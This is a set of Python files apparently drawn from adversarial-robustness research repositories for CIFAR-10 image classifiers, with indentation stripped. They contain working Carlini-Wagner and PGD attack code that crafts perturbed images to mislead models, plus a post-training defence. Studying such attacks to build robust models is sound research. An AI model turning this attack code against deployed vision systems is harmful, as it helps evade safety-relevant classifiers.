def get_focus_filter(self, shape):
max_distance = 16
# shape: Batch x Channel x H x W
focus_filter = torch.ones(shape)
h_center = torch.randint(0, shape[2], (1, ))
w_center = torch.randint(0, shape[3], (1, ))
# print(shape, h_center, w_center)
for b in range(focus_filter.shape[0]):
for c in range(focus_filter.shape[1]):
for h in range(focus_filter.shape[2]):
for w in range(focus_filter.shape[3]):
distance_to_center = torch.sqrt(torch.square(h - h_center) + torch.square(w - w_center))
focus_filter[b][c][h][w] = 1 - min(1, distance_to_center / max_distance)
save_image_stack(focus_filter, "focus_filter")
return focus_filter.cuda()
def set_adv_filter(self, adv_filter):
self.adv_filter = adv_filter
```
#### File: JokerYan/pytorch_image_classification/ensemble_attack.py
```python
import os
import argparse
import pathlib
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.transforms as torch_transforms
import tqdm
from fvcore.common.checkpoint import Checkpointer
from custom_models.ensemble_model import EnsembleModel
from pytorch_image_classification import (
apply_data_parallel_wrapper,
create_dataloader,
create_loss,
create_model,
get_default_config,
update_config,
)
from pytorch_image_classification.transforms import _get_dataset_stats
from pytorch_image_classification.utils import (
AverageMeter,
create_logger,
get_rank,
)
from utils.debug_tools import clear_debug_image, save_image_stack
# attack parameters temporarily attached here
c = 1
lr = 0.01
momentum = 0.9
steps = 200
batch_size = 1
def load_config(options=None):
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, nargs="+", required=True)
parser.add_argument('--output_dir', type=str, nargs="+", required=True)
parser.add_argument('--checkpoint', type=str, nargs="+", required=True) # relative path from output_dir
parser.add_argument('options', default=None, nargs=argparse.REMAINDER)
args = parser.parse_args()
config = get_default_config()
# the length of these lists are the number of models
assert len(args.config) == len(args.output_dir) == len(args.checkpoint)
config_list = [config.clone() for _ in args.output_dir]
for i, config in enumerate(config_list):
config.merge_from_file(args.config[i])
config.merge_from_list(["test.output_dir", args.output_dir[i]])
config.merge_from_list(["test.checkpoint", os.path.join(args.output_dir[i], args.checkpoint[i])])
config.merge_from_list(args.options)
if options:
config.merge_from_list(options)
update_config(config)
config.freeze()
return config_list
def cal_accuracy(output, target):
with torch.no_grad():
if torch.argmax(output) == torch.argmax(target):
return 1
return 0
class CWInfAttack(nn.Module):
'''
c: coefficient of f value to be added to distance.
Higher the c, higher the success rate and higher the distance
see fig 2 of paper
'''
def __init__(self, model, config, c, lr, momentum, steps, device='cuda'):
super(CWInfAttack, self).__init__()
self.model = model
self.config = config
self.mean, self.std = _get_dataset_stats(config)
self.c = c
self.lr = lr
self.steps = steps
self.device = device
self.momentum = momentum
self.Normalize = torch_transforms.Normalize(
self.mean, self.std
)
self.counter = 0
def denormalize(self, images, is_tensor=True):
if is_tensor:
images = images.clone().detach().cpu().numpy()
# image = np.squeeze(images)
std = np.expand_dims(self.std, [0, 2, 3])
mean = np.expand_dims(self.mean, [0, 2, 3])
images = np.multiply(images, std)
mean = np.multiply(np.ones_like(images), mean)
images = images + mean
# images = np.expand_dims(image, 0)
if is_tensor:
images = torch.Tensor(images).to(self.device)
return images
def forward(self, images, labels):
# must be single image
assert images.shape[0] == 1
images = images.clone().detach().to(self.device)
labels = labels.clone().detach().to(self.device)
# image passed in are normalized, thus not in range [0,1]
images = self.denormalize(images)
w = self.get_init_w(images).detach()
w.requires_grad = True
images.requires_grad = False
tau = 1
best_adv_images = images.clone().detach()
best_acc = 0
best_delta = 1
# optimizer = torch.optim.SGD([w], lr=self.lr, momentum=self.momentum)
optimizer = torch.optim.Adam([w], lr=self.lr)
# random target
# labels is of shape [1], only a number from 0 to 9
target_c = torch.remainder(torch.randint(0, 9, labels.shape).to(self.device) + labels, 10)
target = torch.zeros(1, self.config.dataset.n_classes + 1).to(self.device) # the extra logit for is_fake
# target = torch.zeros(1, self.config.dataset.n_classes).to(self.device) # the extra logit for is_fake
target[:, target_c] = 1
finish_step = self.steps
for step in range(self.steps):
adv_images = self.w_to_adv_images(w)
output = self.model(self.Normalize(adv_images))
# print("is_fake", output[0][-1])
# print("target output", output[0][target_c])
f_value = self.c * self.get_f_value(output, target)
delta = self.w_to_delta(w, images)
distance = self.inf_distance(delta, tau)
loss = f_value + distance
# update tau
if torch.max(delta) < tau:
tau = 0.9 * tau
# compute gradient and do update step
optimizer.zero_grad()
loss.sum().backward()
optimizer.step()
# print out results
acc = cal_accuracy(output, target)
avg_delta = torch.mean(delta)
# print('Acc: {}\tDelta: {}'.format(acc, avg_delta))
if acc > best_acc:
best_adv_images = adv_images
best_acc = acc
best_delta = avg_delta
if acc == best_acc and avg_delta < best_delta:
best_adv_images = adv_images
best_acc = acc
best_delta = avg_delta
if acc == 1:
finish_step = step
break
print('Batch finished: Acc: {}\tDelta: {}\tStep: {}'.format(best_acc, best_delta, finish_step))
print('>>>>>')
# pickle.dump(best_adv_images, open('adv_images_batch.pkl', 'wb'))
if self.counter == 0:
clear_debug_image()
if self.counter < 10 and best_acc == 1:
self.counter += 1
save_image_stack(images, 'original input {} {}'.format(self.counter, best_delta))
save_image_stack(best_adv_images, 'adversarial input {} {}'.format(self.counter, best_delta))
# delta_image = torch.abs(best_adv_images - images)
# print(torch.max(delta_image))
# adjusted_delta = delta_image / torch.max(delta_image)
# save_image_stack(adjusted_delta, 'adjusted delta')
return best_adv_images, best_acc, best_delta
@staticmethod
def get_f_value(outputs, target):
src_p = torch.max(outputs * (1 - target))
target_p = torch.max(outputs * target)
f6 = torch.relu(src_p - target_p)
return f6
@staticmethod
def inf_distance(delta, tau):
dist_vec = torch.relu(delta - tau)
return torch.sum(dist_vec)
@staticmethod
def w_to_adv_images(w):
return 1/2 * (torch.tanh(w) + 1)
@staticmethod
def w_to_delta(w, x):
return torch.abs(CWInfAttack.w_to_adv_images(w) - x)
@staticmethod
def get_init_w(x):
return torch.atanh(2 * x - 1)
def ensemble_attack(config, model, test_loader, loss_func, logger):
device = torch.device(config.device)
model.eval()
attack_model = CWInfAttack(model, config, c, lr, momentum, steps).cuda()
accuracy_meter = AverageMeter()
delta_meter = AverageMeter()
adv_image_list = []
for i, (data, targets) in enumerate(test_loader):
if i == 100:
break
data = data.to(device)
targets = targets.to(device)
adv_images, acc, delta = attack_model(data, targets)
accuracy_meter.update(acc, 1)
delta_meter.update(delta, 1)
adv_image_list.append(adv_images)
logger.info(f'Accuracy {accuracy_meter.avg:.4f} Delta {delta_meter.avg:.4f}')
return adv_image_list, accuracy_meter.avg, delta_meter.avg
def main():
config_list = load_config(["test.batch_size", 1])
model_list = []
for config in config_list:
if config.test.output_dir is None:
output_dir = pathlib.Path(config.test.checkpoint).parent
else:
output_dir = pathlib.Path(config.test.output_dir)
output_dir.mkdir(exist_ok=True, parents=True)
model = create_model(config)
# model = apply_data_parallel_wrapper(config, model)
checkpointer = Checkpointer(model,
save_dir=output_dir)
checkpointer.load(config.test.checkpoint)
model_list.append(model)
logger = create_logger(name=__name__, distributed_rank=get_rank())
test_loader = create_dataloader(config_list[0], is_train=False)
_, test_loss = create_loss(config_list[0])
ensemble_model = EnsembleModel(model_list)
ensemble_attack(config_list[0], ensemble_model, test_loader, test_loss, logger)
if __name__ == '__main__':
main()
```
#### File: pytorch_image_classification/config/defaults.py
```python
from .config_node import ConfigNode
config = ConfigNode()
config.device = 'cuda'
# cuDNN
config.cudnn = ConfigNode()
config.cudnn.benchmark = True
config.cudnn.deterministic = False
config.dataset = ConfigNode()
config.dataset.name = 'CIFAR10'
config.dataset.dataset_dir = ''
config.dataset.image_size = 32
config.dataset.n_channels = 3
config.dataset.n_classes = 10
config.dataset.normalize = True
config.model = ConfigNode()
# options: 'cifar', 'imagenet'
# Use 'cifar' for small input images
config.model.type = 'cifar'
config.model.name = 'resnet_preact'
config.model.init_mode = 'kaiming_fan_out'
config.model.vgg = ConfigNode()
config.model.vgg.n_channels = [64, 128, 256, 512, 512]
config.model.vgg.n_layers = [2, 2, 3, 3, 3]
config.model.vgg.use_bn = True
config.model.resnet = ConfigNode()
config.model.resnet.depth = 110 # for cifar type model
config.model.resnet.n_blocks = [2, 2, 2, 2] # for imagenet type model
config.model.resnet.block_type = 'basic'
config.model.resnet.initial_channels = 16
config.model.resnet_preact = ConfigNode()
config.model.resnet_preact.depth = 110 # for cifar type model
config.model.resnet_preact.n_blocks = [2, 2, 2, 2] # for imagenet type model
config.model.resnet_preact.block_type = 'basic'
config.model.resnet_preact.initial_channels = 16
config.model.resnet_preact.remove_first_relu = False
config.model.resnet_preact.add_last_bn = False
config.model.resnet_preact.preact_stage = [True, True, True]
config.model.wrn = ConfigNode()
config.model.wrn.depth = 28 # for cifar type model
config.model.wrn.initial_channels = 16
config.model.wrn.widening_factor = 10
config.model.wrn.drop_rate = 0.0
config.model.densenet = ConfigNode()
config.model.densenet.depth = 100 # for cifar type model
config.model.densenet.n_blocks = [6, 12, 24, 16] # for imagenet type model
config.model.densenet.block_type = 'bottleneck'
config.model.densenet.growth_rate = 12
config.model.densenet.drop_rate = 0.0
config.model.densenet.compression_rate = 0.5
config.model.pyramidnet = ConfigNode()
config.model.pyramidnet.depth = 272 # for cifar type model
config.model.pyramidnet.n_blocks = [3, 24, 36, 3] # for imagenet type model
config.model.pyramidnet.initial_channels = 16
config.model.pyramidnet.block_type = 'bottleneck'
config.model.pyramidnet.alpha = 200
config.model.resnext = ConfigNode()
config.model.resnext.depth = 29 # for cifar type model
config.model.resnext.n_blocks = [3, 4, 6, 3] # for imagenet type model
config.model.resnext.initial_channels = 64
config.model.resnext.cardinality = 8
config.model.resnext.base_channels = 4
config.model.shake_shake = ConfigNode()
config.model.shake_shake.depth = 26 # for cifar type model
config.model.shake_shake.initial_channels = 96
config.model.shake_shake.shake_forward = True
config.model.shake_shake.shake_backward = True
config.model.shake_shake.shake_image = True
config.model.se_resnet_preact = ConfigNode()
config.model.se_resnet_preact.depth = 110 # for cifar type model
config.model.se_resnet_preact.initial_channels = 16
config.model.se_resnet_preact.se_reduction = 16
config.model.se_resnet_preact.block_type = 'basic'
config.model.se_resnet_preact.initial_channels = 16
config.model.se_resnet_preact.remove_first_relu = False
config.model.se_resnet_preact.add_last_bn = False
config.model.se_resnet_preact.preact_stage = [True, True, True]
config.train = ConfigNode()
config.train.checkpoint = ''
config.train.resume = False
config.train.use_apex = True
# optimization level for NVIDIA apex
# O0 = fp32
# O1 = mixed precision
# O2 = almost fp16
# O3 = fp16
config.train.precision = 'O0'
config.train.batch_size = 128
config.train.subdivision = 1
# optimizer (options: sgd, adam, lars, adabound, adaboundw)
config.train.optimizer = 'sgd'
config.train.base_lr = 0.1
config.train.momentum = 0.9
config.train.nesterov = True
config.train.weight_decay = 1e-4
config.train.no_weight_decay_on_bn = False
config.train.gradient_clip = 0.0
config.train.start_epoch = 0
config.train.seed = 0
config.train.val_first = True
config.train.val_period = 1
config.train.val_ratio = 0.0
config.train.use_test_as_val = True
config.train.output_dir = 'experiments/exp00'
config.train.log_period = 100
config.train.checkpoint_period = 10
config.train.use_tensorboard = True
config.tensorboard = ConfigNode()
config.tensorboard.train_images = False
config.tensorboard.val_images = False
config.tensorboard.model_params = False
# optimizer
config.optim = ConfigNode()
# Adam
config.optim.adam = ConfigNode()
config.optim.adam.betas = (0.9, 0.999)
# LARS
config.optim.lars = ConfigNode()
config.optim.lars.eps = 1e-9
config.optim.lars.threshold = 1e-2
# AdaBound
config.optim.adabound = ConfigNode()
config.optim.adabound.betas = (0.9, 0.999)
config.optim.adabound.final_lr = 0.1
config.optim.adabound.gamma = 1e-3
# scheduler
config.scheduler = ConfigNode()
config.scheduler.epochs = 160
# warm up (options: none, linear, exponential)
config.scheduler.warmup = ConfigNode()
config.scheduler.warmup.type = 'none'
config.scheduler.warmup.epochs = 0
config.scheduler.warmup.start_factor = 1e-3
config.scheduler.warmup.exponent = 4
# main scheduler (options: constant, linear, multistep, cosine, sgdr)
config.scheduler.type = 'multistep'
config.scheduler.milestones = [80, 120]
config.scheduler.lr_decay = 0.1
config.scheduler.lr_min_factor = 0.001
config.scheduler.T0 = 10
config.scheduler.T_mul = 1.
# train data loader
config.train.dataloader = ConfigNode()
config.train.dataloader.num_workers = 2
config.train.dataloader.drop_last = True
config.train.dataloader.pin_memory = False
config.train.dataloader.non_blocking = False
# validation data loader
config.validation = ConfigNode()
config.validation.batch_size = 256
config.validation.dataloader = ConfigNode()
config.validation.dataloader.num_workers = 2
config.validation.dataloader.drop_last = False
config.validation.dataloader.pin_memory = False
config.validation.dataloader.non_blocking = False
# distributed
config.train.distributed = False
config.train.dist = ConfigNode()
config.train.dist.backend = 'nccl'
config.train.dist.init_method = 'env://'
config.train.dist.world_size = -1
config.train.dist.node_rank = -1
config.train.dist.local_rank = 0
config.train.dist.use_sync_bn = False
config.augmentation = ConfigNode()
config.augmentation.use_random_crop = True
config.augmentation.use_random_horizontal_flip = True
config.augmentation.use_cutout = False
config.augmentation.use_random_erasing = False
config.augmentation.use_dual_cutout = False
config.augmentation.use_mixup = False
config.augmentation.use_ricap = False
config.augmentation.use_cutmix = False
config.augmentation.use_label_smoothing = False
config.augmentation.random_crop = ConfigNode()
config.augmentation.random_crop.padding = 4
config.augmentation.random_crop.fill = 0
config.augmentation.random_crop.padding_mode = 'constant'
config.augmentation.random_horizontal_flip = ConfigNode()
config.augmentation.random_horizontal_flip.prob = 0.5
config.augmentation.cutout = ConfigNode()
config.augmentation.cutout.prob = 1.0
config.augmentation.cutout.mask_size = 16
config.augmentation.cutout.cut_inside = False
config.augmentation.cutout.mask_color = 0
config.augmentation.cutout.dual_cutout_alpha = 0.1
config.augmentation.random_erasing = ConfigNode()
config.augmentation.random_erasing.prob = 0.5
config.augmentation.random_erasing.area_ratio_range = [0.02, 0.4]
config.augmentation.random_erasing.min_aspect_ratio = 0.3
config.augmentation.random_erasing.max_attempt = 20
config.augmentation.mixup = ConfigNode()
config.augmentation.mixup.alpha = 1.0
config.augmentation.ricap = ConfigNode()
config.augmentation.ricap.beta = 0.3
config.augmentation.cutmix = ConfigNode()
config.augmentation.cutmix.alpha = 1.0
config.augmentation.label_smoothing = ConfigNode()
config.augmentation.label_smoothing.epsilon = 0.1
config.tta = ConfigNode()
config.tta.use_resize = False
config.tta.use_center_crop = False
config.tta.resize = 256
# test config
config.test = ConfigNode()
config.test.checkpoint = ''
config.test.output_dir = ''
config.test.batch_size = 256
# test data loader
config.test.dataloader = ConfigNode()
config.test.dataloader.num_workers = 2
config.test.dataloader.pin_memory = False
# custom part
config.custom_model = ConfigNode()
config.custom_model.name = ''
def get_default_config():
return config.clone()
```
#### File: pytorch_image_classification/scheduler/components.py
```python
import numpy as np
class ConstantScheduler:
def __init__(self, steps, lr):
self.steps = steps
self.lr = lr
def __call__(self, step):
return self.lr
class CosineScheduler:
def __init__(self, steps, base_lr, lr_min_factor=1e-3):
self.steps = steps
self.base_lr = base_lr
self.lr_min_factor = lr_min_factor
def __call__(self, step):
return self.base_lr * (self.lr_min_factor +
(1 - self.lr_min_factor) * 0.5 *
(1 + np.cos(step / self.steps * np.pi)))
class ExponentialScheduler:
def __init__(self, steps, base_lr, exponent, lr_start_factor=1e-3):
self.steps = steps
self.base_lr = base_lr
self.exponent = exponent
self.lr_start_factor = lr_start_factor
def __call__(self, step):
return self.base_lr * (self.lr_start_factor +
(1 - self.lr_start_factor) *
(step / self.steps)**self.exponent)
class LinearScheduler:
def __init__(self, steps, lr_start, lr_end):
self.steps = steps
self.lr_start = lr_start
self.lr_end = lr_end
def __call__(self, step):
return self.lr_start + (self.lr_end -
self.lr_start) * step / self.steps
``` |
{
"source": "JokerYan/TRADES",
"score": 2
} |
#### File: JokerYan/TRADES/post_utils.py
```python
import copy
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import Subset
from torchvision import datasets, transforms
import apex.amp as amp
import numpy as np
from trades import trades_loss
cifar10_mean = (0.0, 0.0, 0.0)
cifar10_std = (1.0, 1.0, 1.0)
mu = torch.tensor(cifar10_mean).view(3,1,1).cuda()
std = torch.tensor(cifar10_std).view(3,1,1).cuda()
upper_limit = ((1 - mu)/ std)
lower_limit = ((0 - mu)/ std)
def cal_accuracy(outputs, labels):
_, predictions = torch.max(outputs, 1)
# collect the correct predictions for each class
correct = 0
total = 0
for label, prediction in zip(labels, predictions):
if label == prediction:
correct += 1
total += 1
return correct / total
def merge_images(train_images, val_images, ratio, device):
batch_size = len(train_images)
repeated_val_images = val_images.repeat(batch_size, 1, 1, 1)
merged_images = ratio * train_images.to(device) + (1 - ratio) * repeated_val_images.to(device)
# image[0][channel] = 0.5 * image[0][channel].to(device) + 0.5 * val_images[0][channel].to(device)
return merged_images
def clamp(X, lower_limit, upper_limit):
return torch.max(torch.min(X, upper_limit), lower_limit)
def get_train_loaders_by_class(dir_, batch_size):
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(cifar10_mean, cifar10_std),
])
train_dataset = datasets.CIFAR10(
dir_, train=True, transform=train_transform, download=True)
indices_list = [[] for _ in range(10)]
for i in range(len(train_dataset)):
label = int(train_dataset[i][1])
indices_list[label].append(i)
dataset_list = [Subset(train_dataset, indices) for indices in indices_list]
train_loader_list = [
torch.utils.data.DataLoader(
dataset=dataset,
batch_size=batch_size,
shuffle=True,
pin_memory=True,
num_workers=0,
) for dataset in dataset_list
]
return train_loader_list
def attack_pgd(model, X, y, epsilon, alpha, attack_iters, restarts, opt=None, random_start=True):
max_loss = torch.zeros(y.shape[0]).cuda()
max_delta = torch.zeros_like(X).cuda()
epsilon = torch.ones([3, 1, 1]).cuda() * epsilon
for zz in range(restarts):
delta = torch.zeros_like(X).cuda()
if random_start:
for i in range(len(epsilon)):
delta[:, i, :, :].uniform_(-epsilon[i][0][0].item(), epsilon[i][0][0].item())
delta.data = clamp(delta, lower_limit - X, upper_limit - X)
delta.requires_grad = True
for _ in range(attack_iters):
output = model(X + delta)
index = torch.where(output.max(1)[1] == y)
if len(index[0]) == 0:
break
loss = F.cross_entropy(output, y)
if opt is not None:
with amp.scale_loss(loss, opt) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
grad = delta.grad.detach()
d = delta[index[0], :, :, :]
g = grad[index[0], :, :, :]
d = clamp(d + alpha * torch.sign(g), -epsilon, epsilon)
d = clamp(d, lower_limit - X[index[0], :, :, :], upper_limit - X[index[0], :, :, :])
delta.data[index[0], :, :, :] = d
delta.grad.zero_()
all_loss = F.cross_entropy(model(X+delta), y, reduction='none').detach()
max_delta[all_loss >= max_loss] = delta.detach()[all_loss >= max_loss]
max_loss = torch.max(max_loss, all_loss)
return max_delta
def attack_pgd_targeted(model, X, y, target, epsilon, alpha, attack_iters, restarts, opt=None, random_start=True):
max_loss = torch.zeros(y.shape[0]).cuda()
max_delta = torch.zeros_like(X).cuda()
epsilon = torch.ones([3, 1, 1]).cuda() * epsilon
for zz in range(restarts):
delta = torch.zeros_like(X).cuda()
if random_start:
for i in range(len(epsilon)):
delta[:, i, :, :].uniform_(-epsilon[i][0][0].item(), epsilon[i][0][0].item())
delta.data = clamp(delta, lower_limit - X, upper_limit - X)
delta.requires_grad = True
for _ in range(attack_iters):
output = model(X + delta)
index = torch.where(output.max(1)[1] != target)
if len(index[0]) == 0:
break
loss = F.cross_entropy(output, target)
if opt is not None:
with amp.scale_loss(loss, opt) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
grad = delta.grad.detach()
d = delta[index[0], :, :, :]
g = -1 * grad[index[0], :, :, :]
d = clamp(d + alpha * torch.sign(g), -epsilon, epsilon)
d = clamp(d, lower_limit - X[index[0], :, :, :], upper_limit - X[index[0], :, :, :])
delta.data[index[0], :, :, :] = d
delta.grad.zero_()
all_loss = F.cross_entropy(model(X+delta), target, reduction='none').detach()
max_delta[all_loss >= max_loss] = delta.detach()[all_loss >= max_loss]
max_loss = torch.max(max_loss, all_loss)
return max_delta
def attack_pgd_trades(model, data, label, epsilon, alpha, step_count, random_start, device):
X, y = Variable(data, requires_grad=True), Variable(label)
X_pgd = Variable(X.data, requires_grad=True)
if random_start:
random_noise = torch.FloatTensor(*X_pgd.shape).uniform_(-epsilon, epsilon).to(device)
X_pgd = Variable(X_pgd.data + random_noise, requires_grad=True)
for _ in range(step_count):
opt = torch.optim.SGD([X_pgd], lr=1e-3)
opt.zero_grad()
with torch.enable_grad():
loss = nn.CrossEntropyLoss()(model(X_pgd), y)
loss.backward()
eta = alpha * X_pgd.grad.data.sign()
X_pgd = Variable(X_pgd.data + eta, requires_grad=True)
eta = torch.clamp(X_pgd.data - X.data, -epsilon, epsilon)
X_pgd = Variable(X.data + eta, requires_grad=True)
X_pgd = Variable(torch.clamp(X_pgd, 0, 1.0), requires_grad=True)
return X_pgd
def attack_pgd_trades_targeted(model, data, target, epsilon, alpha, step_count, random_start, device):
X, y = Variable(data, requires_grad=True), Variable(target)
X_pgd = Variable(X.data, requires_grad=True)
if random_start:
random_noise = torch.FloatTensor(*X_pgd.shape).uniform_(-epsilon, epsilon).to(device)
X_pgd = Variable(X_pgd.data + random_noise, requires_grad=True)
for _ in range(step_count):
opt = torch.optim.SGD([X_pgd], lr=1e-3)
opt.zero_grad()
with torch.enable_grad():
loss = nn.CrossEntropyLoss()(model(X_pgd), y)
loss.backward()
eta = -1 * alpha * X_pgd.grad.data.sign()
X_pgd = Variable(X_pgd.data + eta, requires_grad=True)
eta = torch.clamp(X_pgd.data - X.data, -epsilon, epsilon)
X_pgd = Variable(X.data + eta, requires_grad=True)
X_pgd = Variable(torch.clamp(X_pgd, 0, 1.0), requires_grad=True)
return X_pgd
def post_train(model, images, train_loader, train_loaders_by_class, args):
alpha = (10 / 255)
epsilon = (8 / 255)
loss_func = nn.CrossEntropyLoss()
device = torch.device('cuda')
model = copy.deepcopy(model)
# model.train()
fix_model = copy.deepcopy(model)
# attack_model = torchattacks.PGD(model, eps=(8/255)/std, alpha=(2/255)/std, steps=20)
optimizer = torch.optim.SGD(lr=args.pt_lr,
params=model.parameters(),
momentum=0.9,
nesterov=True)
kl_loss = nn.KLDivLoss(reduction='batchmean')
# target_bce_loss_func = TargetBCELoss()
# target_bl_loss_func = TargetBLLoss()
images = images.detach()
with torch.enable_grad():
# find neighbour
original_output = fix_model(images)
original_class = torch.argmax(original_output).reshape(1)
# neighbour_images = attack_model(images, original_class)
# neighbour_delta = attack_pgd(model, images, original_class, epsilon, alpha,
# attack_iters=20, restarts=1, random_start=args.rs_neigh)
# neighbour_images = neighbour_delta + images
min_target_loss = float('inf')
max_target_loss = float('-inf')
neighbour_delta = None
for target_idx in range(10):
if target_idx == original_class:
continue
target = torch.ones_like(original_class) * target_idx
# neighbour_delta_targeted = attack_pgd_targeted(model, images, original_class, target, epsilon, alpha,
# attack_iters=20, restarts=1, random_start=args.rs_neigh).detach()
neighbour_images_targeted = attack_pgd_trades(fix_model, images, original_class, epsilon, alpha, 20, args.rs_neigh, device)
neighbour_delta_targeted = neighbour_images_targeted - images
target_output = fix_model(images + neighbour_delta_targeted)
target_loss = loss_func(target_output, target)
if target_loss < min_target_loss:
min_target_loss = target_loss
neighbour_delta = neighbour_delta_targeted
# target_loss = loss_func(target_output, original_class)
# if target_loss > max_target_loss:
# max_target_loss = max_target_loss
# neighbour_delta = neighbour_delta_targeted
# print(int(target), float(target_loss))
neighbour_images = images + neighbour_delta
# neighbour_images = attack_pgd_trades(fix_model, images, original_class, epsilon, alpha, 20, args.rs_neigh, device)
# neighbour_delta = (neighbour_images - images).detach()
neighbour_output = fix_model(neighbour_images)
neighbour_class = torch.argmax(neighbour_output).reshape(1)
if original_class == neighbour_class:
print('original class == neighbour class')
if args.pt_data == 'ori_neigh':
return model, original_class, neighbour_class, None, None
loss_list = []
acc_list = []
for i in range(args.pt_iter):
# # randomize neighbour
# if args.pt_data == 'ori_rand':
# neighbour_class = (original_class + random.randint(1, 9)) % 10
# elif args.pt_data == 'rand':
# original_class = (original_class + random.randint(0, 9)) % 10
# neighbour_class = (original_class + random.randint(0, 9)) % 10
# else:
# raise NotImplementedError
original_data, original_label = next(iter(train_loaders_by_class[original_class]))
neighbour_data, neighbour_label = next(iter(train_loaders_by_class[neighbour_class]))
# train_data, train_label = next(iter(train_loader))
# data = train_data.to(device)
# label = train_label.to(device)
if args.pt_data == 'ori_neigh_train':
raise NotImplementedError
# data = torch.vstack([original_data, neighbour_data, train_data]).to(device)
# label = torch.hstack([original_label, neighbour_label, train_label]).to(device)
else:
data = torch.vstack([original_data, neighbour_data]).to(device)
label = torch.hstack([original_label, neighbour_label]).to(device)
if args.mixup:
data = merge_images(data, images, 0.7, device)
# target = torch.hstack([neighbour_label, original_label]).to(device)
# # generate pgd adv examples
# X, y = Variable(data, requires_grad=True), Variable(label)
# X_pgd = Variable(X.data, requires_grad=True)
# random_noise = torch.FloatTensor(*X_pgd.shape).uniform_(-epsilon, epsilon).to(device)
# X_pgd = Variable(X_pgd.data + random_noise, requires_grad=True)
# for _ in range(20):
# opt = torch.optim.SGD([X_pgd], lr=1e-3)
# opt.zero_grad()
#
# with torch.enable_grad():
# loss = nn.CrossEntropyLoss()(fix_model(X_pgd), y)
# loss.backward()
# eta = 0.003 * X_pgd.grad.data.sign()
# X_pgd = Variable(X_pgd.data + eta, requires_grad=True)
# eta = torch.clamp(X_pgd.data - X.data, -epsilon, epsilon)
# X_pgd = Variable(X.data + eta, requires_grad=True)
# X_pgd = Variable(torch.clamp(X_pgd, 0, 1.0), requires_grad=True)
# adv_input = X_pgd
# generate fgsm adv examples
delta = (torch.rand_like(data) * 2 - 1) * epsilon # uniform rand from [-eps, eps]
noise_input = data + delta
noise_input.requires_grad = True
noise_output = model(noise_input)
loss = loss_func(noise_output, label) # loss to be maximized
# loss = target_bce_loss_func(noise_output, label, original_class, neighbour_class) # bce loss to be maximized
input_grad = torch.autograd.grad(loss, noise_input)[0]
delta = delta + alpha * torch.sign(input_grad)
delta.clamp_(-epsilon, epsilon)
adv_input = data + delta
# # directed adv
# adv_input = data + (torch.randint(0, 2, size=()) - 0.5).to(device) * 2 * neighbour_delta
# adv_input = data + -1 * torch.rand_like(data).to(device) * neighbour_delta
# adv_input = data + -1 * neighbour_delta
# directed_delta = torch.vstack([torch.ones_like(original_data).to(device) * neighbour_delta,
# torch.ones_like(neighbour_data).to(device) * -1 * neighbour_delta])
# adv_input = data + directed_delta
# generate pgd adv example
# attack_model.set_mode_targeted_by_function(lambda im, la: target)
# adv_input = attack_model(data, label)
normal_output = model(data.detach())
if args.pt_method == 'adv':
adv_output = model(adv_input.detach())
elif args.pt_method == 'normal':
adv_output = model(data.detach()) # non adv training
else:
raise NotImplementedError
# _, adv_output_class = torch.max(adv_output, 1)
# original_class_expanded = torch.ones_like(adv_output_class) * int(original_class)
# neighbour_class_expanded = torch.ones_like(adv_output_class) * int(neighbour_class)
# filter_condition = torch.logical_or(torch.eq(adv_output_class, original_class_expanded),
# torch.eq(adv_output_class, neighbour_class_expanded))
# filter_condition = filter_condition.unsqueeze(1).expand([len(filter_condition), 10])
# print(torch.mean(filter_condition.float()))
# adv_output = torch.where(filter_condition, adv_output, normal_output)
# adv_class = torch.argmax(adv_output)
# loss_pos = loss_func(adv_output, label)
loss_norm = loss_func(normal_output, label)
loss_kl = kl_loss(F.log_softmax(adv_output, dim=1), F.softmax(normal_output, dim=1))
# loss_trades = trades_loss(model, data, label, optimizer)
# loss_neg = loss_func(adv_output, target)
# bce_loss = target_bce_loss_func(adv_output, label, original_class, neighbour_class)
# bl_loss = target_bl_loss_func(adv_output, label, original_class, neighbour_class)
# loss = torch.mean(loss_list)
print("{:.4f} {:.4f}".format(float(loss_norm), float(loss_kl)))
loss = loss_norm + 6 * loss_kl
# loss = loss_trades
optimizer.zero_grad()
loss.backward()
optimizer.step()
defense_acc = cal_accuracy(adv_output, label)
loss_list.append(loss)
acc_list.append(defense_acc)
print('loss: {:.4f} acc: {:.4f}'.format(loss, defense_acc))
return model, original_class, neighbour_class, loss_list, acc_list
``` |
{
"source": "JokerYan/ZOO-Attack",
"score": 2
} |
#### File: ZOO-Attack/fast_adversarial/post_model.py
```python
import argparse
import os
import torch
import torch.nn as nn
from torchvision import transforms
from .preact_resnet import PreActResNet18
from .utils import get_loaders, get_train_loaders_by_class, post_train
pretrained_model_path = os.path.join('.', 'pretrained_models', 'cifar_model_weights_30_epochs.pth')
cifar10_mean = (0.4914, 0.4822, 0.4465)
cifar10_std = (0.2471, 0.2435, 0.2616)
class DummyArgs:
def __init__(self):
self.data_dir = '../cifar-data'
self.mixup = False
self.pt_data = 'ori_neigh'
self.pt_method = 'adv'
self.pt_iter = 50
self.rs_neigh = False
self.blackbox = False
class PostModel(nn.Module):
def __init__(self, model=None, args=None):
super().__init__()
if model is None:
state_dict = torch.load(pretrained_model_path)
model = PreActResNet18().cuda()
model.load_state_dict(state_dict)
model.float()
model.eval()
self.model = model
self.transform = transforms.Compose([
transforms.Normalize(cifar10_mean, cifar10_std)
])
if args is None:
args = DummyArgs()
self.args = args
self.train_loader, _ = get_loaders(self.args.data_dir, batch_size=128)
self.train_loaders_by_class = get_train_loaders_by_class(self.args.data_dir, batch_size=128)
self.post_model = None
# def update_post_model(self, images):
# sample_images = images[0, :, :, :].unsqueeze(0)
# sample_images = self.transform(sample_images)
# del self.post_model
# post_model, original_class, neighbour_class, loss_list, acc_list, neighbour_delta = \
# post_train(self.model, sample_images, self.train_loader, self.train_loaders_by_class, self.args)
# self.post_model = post_model
def forward(self, images):
images = self.transform(images)
sample_images = images[0, :, :, :].unsqueeze(0)
post_model, original_class, neighbour_class, loss_list, acc_list, neighbour_delta = \
post_train(self.model, sample_images, self.train_loader, self.train_loaders_by_class, self.args)
return post_model(images)
# return self.model(images)
```
